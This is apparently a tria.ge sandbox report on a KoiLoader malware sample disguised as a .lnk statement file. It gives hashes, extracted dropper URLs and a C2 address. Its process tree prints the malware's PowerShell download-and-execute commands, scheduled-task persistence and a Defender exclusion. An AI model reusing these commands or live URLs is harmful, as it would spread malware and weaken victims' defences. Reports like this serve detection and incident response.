Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

22_11_2024_stmnt.lnk

windows7-x64

10

22_11_2024_stmnt.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    116s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/12/2024, 11:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    22_11_2024_stmnt.lnk

  • Size

    3KB

  • MD5

    f7f1052c9d09d61490d8f116238af21e

  • SHA1

    0f2550bb03f31716232de245a02823885f529e09

  • SHA256

    9ee3acebaae539dc60ea9321cfcf27451f6f05afc80ae7f7a959f76a8d587839

  • SHA512

    51737afa22f193a892525226575877a0893521ffd3dec18542a7f2b0cdef5807f736ae4458a5cf7f306c8e033fdacea870d9527529172f74cbbdbcde8a646568

Score
10/10
koiloaderdefense_evasiondiscoveryexecutionloader

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
exe.dropper

https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1

Extracted

Family

koiloader

C2

http://195.123.217.43/oversate.php

Attributes
  • payload_url

    https://www.italialife24.it/wp-content/uploads/2021/05

Signatures

  • KoiLoader

    KoiLoader is a malware loader written in C++.

    loaderkoiloader
  • Koiloader family
    koiloader
  • Detects KoiLoader payload 2 IoCs
    loader
  • Blocklisted process makes network request 8 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Indicator Removal: Clear Persistence 1 TTPs 2 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

    defense_evasion
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\22_11_2024_stmnt.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4224
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1372
  • C:\Windows\system32\wscript.EXE
    C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\4Y25RLKWX7ET.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\4Y25RLKWX7ET.js "
      2⤵
      • Blocklisted process makes network request
      • Indicator Removal: Clear Persistence
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:436
      • C:\Windows\system32\schtasks.exe
        "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
        3⤵
          PID:4220
        • C:\Windows\system32\wscript.exe
          "C:\Windows\system32\wscript.exe" C:\ProgramData\4Y25RLKWX7ET.js
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2012
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7zMFXWWDVWWR'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
            4⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2940
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1068
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -command IEX(IWR -UseBasicParsing 'https://www.italialife24.it/wp-content/uploads/2021/05/sd2.ps1')
                6⤵
                • Blocklisted process makes network request
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2220
    • C:\Windows\SysWOW64\DllHost.exe
      C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
      1⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3692
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:460
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
    • C:\Windows\system32\wscript.EXE
      C:\Windows\system32\wscript.EXE C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
      1⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:3432
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\4Y25RLKWX7ET.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\4Y25RLKWX7ET.js "
        2⤵
        • Blocklisted process makes network request
        • Indicator Removal: Clear Persistence
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3392
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
          3⤵
            PID:3452
          • C:\Windows\system32\wscript.exe
            "C:\Windows\system32\wscript.exe" C:\ProgramData\4Y25RLKWX7ET.js
            3⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:812
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$l1 = 'https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php'; $l2 = 'https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1'; $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*siU*s') {$c=$b}}; $env:paths = '7z8UUKGAKBYB'; IEX(Invoke-WebRequest -UseBasicParsing $l1); IEX(Invoke-WebRequest -UseBasicParsing $l2)"
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4292
      • C:\Windows\System32\wscript.exe
        C:\Windows\System32\wscript.exe "C:\ProgramData\r755b0f1a-bb38-4bb2-bc7e-240c892146eer.js"
        1⤵
          PID:3716

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\4Y25RLKWX7ET.js
          Filesize

          1KB

          MD5

          38f80cd0e4b83433205388fe685b4739

          SHA1

          911d3a6e0d55fe767dd6114d2f47f00c574971b9

          SHA256

          63c918fc78d8b14d88d5bfdb46e2c9f4006ef36566a547cfa4513a9054bb632c

          SHA512

          fbdda6e3f34293654db5c77a451d59497ad19571363da70a2026ee738c3617c81ea87ee19b3b604d7e369e74a74cd99f690b4df575933acf75cf28ed37c1ce3c

          Download Submit

        • C:\ProgramData\4Y25RLKWX7ET.js
          Filesize

          1KB

          MD5

          4e57858e50d2d3348fd5cdaac9c45cb6

          SHA1

          707da5594f9d616e17a337f111fbcfbd9c7da430

          SHA256

          fa953391cd78a598c3f04fdb2942299e5f3213c3f9be579c9c7a490bee053b86

          SHA512

          e3be104730bce5170dfe1d1fe444013295f54a0c70bdca42755c7243071714f8bebe52d71574051738d1fa2ece423723ad0d607d1cd90e184cbb90ef2cfa543a

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          2f57fde6b33e89a63cf0dfdd6e60a351

          SHA1

          445bf1b07223a04f8a159581a3d37d630273010f

          SHA256

          3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

          SHA512

          42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          968cb9309758126772781b83adb8a28f

          SHA1

          8da30e71accf186b2ba11da1797cf67f8f78b47c

          SHA256

          92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

          SHA512

          4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
          Filesize

          53KB

          MD5

          06ad34f9739c5159b4d92d702545bd49

          SHA1

          9152a0d4f153f3f40f7e606be75f81b582ee0c17

          SHA256

          474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

          SHA512

          c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          19KB

          MD5

          871a523b71e8a0ddafedb4bf6b28228a

          SHA1

          629a002515cf86dcf39175af1b3b72be89ba1104

          SHA256

          d7e567b2b89540347ce28208c63b9335b47211cd2fa4bcce08d852b7b9bbff88

          SHA512

          b6db44085b5ca9bc7dc556e2091c152986c12a060aefe4cc7df53573236d97cf8e2b6606bbfe22c7107bd696261c416b614f7ab12a542e46438f9cdd829eeff5

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          477031a32089e6d066092d640b526add

          SHA1

          5041602c7c71b4c6e40928039dcc07b6b32a67f2

          SHA256

          0ec3dcb238a28e1b43e2f7b03f955f6304927314c40a51f1d4b2b00345c12bef

          SHA512

          01388ea1af8248901beb17d1fa62efead2ae1bf9accfc8e132f4f0c0e77c068fd7e998d218043fdc90c497824ca3723689502490da4fd97237a4f0d40ef2bb4e

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          3db5a3b556b01c59c5812cb86abb674e

          SHA1

          3848e5419d5c47879f159247e4f1b08005674cf0

          SHA256

          218d487f881ce9640acd16f7476b445471b83671569e99973f77d0bbf6c42ffa

          SHA512

          3eb6575d3e476053a65b2631b0cd0d584056ca476058ee2706c69fe10b0502460c40f8985f1f4666e42fba2809924f6dc34ba2e9b2629217542e45cb3640adcd

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          143a478fb47996f74bbbcdaa252b9e0b

          SHA1

          288893a45c1c50f8245a32aa06dfb1ac2ff31c83

          SHA256

          6d91b6cc49e12bf850b873bfd57f591a37fe1aef5ca6e2bc8855dc866abf479b

          SHA512

          e7e2d235fc60e58fe10961515db7f1a667cc58268b8cd3066afa5e7e4de0b1217e3cb85fbe24230b3eb7ac94399fa42971772954a0c309d3cb9334b7a67f93d8

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p5enjb5m.z3c.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\evQtmlDaSRMzUk.js
          Filesize

          304B

          MD5

          1532c9a041d5c978a7201d8bb497cbbe

          SHA1

          c5af01f7a147936e90511bdd9c261e8b1f3f16be

          SHA256

          b046dc052809fff0c8907006e4be969703fdcc6c1c44471605a013cc71249f92

          SHA512

          2b2fe36fa5daae028ba5a2289a292f1040ea643ae2556e6d3bcd3c3de7aeb4ef716da2ad62467373084527b8f2f49e776b503bfca2eeecdde116dd89998b707c

          Download Submit

        • memory/448-18-0x000002B3C1340000-0x000002B3C155C000-memory.dmp

          Filesize

          2.1MB

          Download

        • memory/448-14-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/448-2-0x00007FF8563B3000-0x00007FF8563B5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/448-13-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/448-12-0x000002B3A9010000-0x000002B3A9032000-memory.dmp

          Filesize

          136KB

          Download

        • memory/448-19-0x00007FF8563B0000-0x00007FF856E71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2156-70-0x0000000006EA0000-0x0000000006ED2000-memory.dmp

          Filesize

          200KB

          Download

        • memory/2156-82-0x0000000006EE0000-0x0000000006F83000-memory.dmp

          Filesize

          652KB

          Download

        • memory/2156-96-0x0000000007220000-0x0000000007234000-memory.dmp

          Filesize

          80KB

          Download

        • memory/2156-95-0x0000000007210000-0x000000000721E000-memory.dmp

          Filesize

          56KB

          Download

        • memory/2156-94-0x00000000071E0000-0x00000000071F1000-memory.dmp

          Filesize

          68KB

          Download

        • memory/2156-93-0x0000000007260000-0x00000000072F6000-memory.dmp

          Filesize

          600KB

          Download

        • memory/2156-98-0x0000000007300000-0x0000000007308000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2156-97-0x0000000007320000-0x000000000733A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2156-71-0x0000000070F60000-0x0000000070FAC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2156-81-0x00000000061F0000-0x000000000620E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2156-83-0x0000000007050000-0x000000000705A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/2220-105-0x0000000008120000-0x00000000081B2000-memory.dmp

          Filesize

          584KB

          Download

        • memory/2220-101-0x0000000007750000-0x0000000007772000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2220-102-0x00000000086D0000-0x0000000008C74000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/2220-103-0x0000000007890000-0x00000000078AA000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2220-104-0x0000000007940000-0x0000000007990000-memory.dmp

          Filesize

          320KB

          Download

        • memory/2940-36-0x0000000003160000-0x0000000003196000-memory.dmp

          Filesize

          216KB

          Download

        • memory/2940-57-0x0000000008550000-0x000000000855D000-memory.dmp

          Filesize

          52KB

          Download

        • memory/2940-56-0x00000000084B0000-0x00000000084B1000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2940-55-0x0000000007D90000-0x000000000840A000-memory.dmp

          Filesize

          6.5MB

          Download

        • memory/2940-54-0x0000000006B30000-0x0000000006B4A000-memory.dmp

          Filesize

          104KB

          Download

        • memory/2940-53-0x0000000006780000-0x00000000067CC000-memory.dmp

          Filesize

          304KB

          Download

        • memory/2940-52-0x0000000006740000-0x000000000675E000-memory.dmp

          Filesize

          120KB

          Download

        • memory/2940-50-0x0000000006190000-0x00000000064E4000-memory.dmp

          Filesize

          3.3MB

          Download

        • memory/2940-39-0x0000000005810000-0x0000000005876000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2940-40-0x0000000005880000-0x00000000058E6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/2940-38-0x0000000005770000-0x0000000005792000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2940-37-0x0000000005A60000-0x0000000006088000-memory.dmp

          Filesize

          6.2MB

          Download

        • memory/4292-135-0x00000000077C0000-0x00000000077CD000-memory.dmp

          Filesize

          52KB

          Download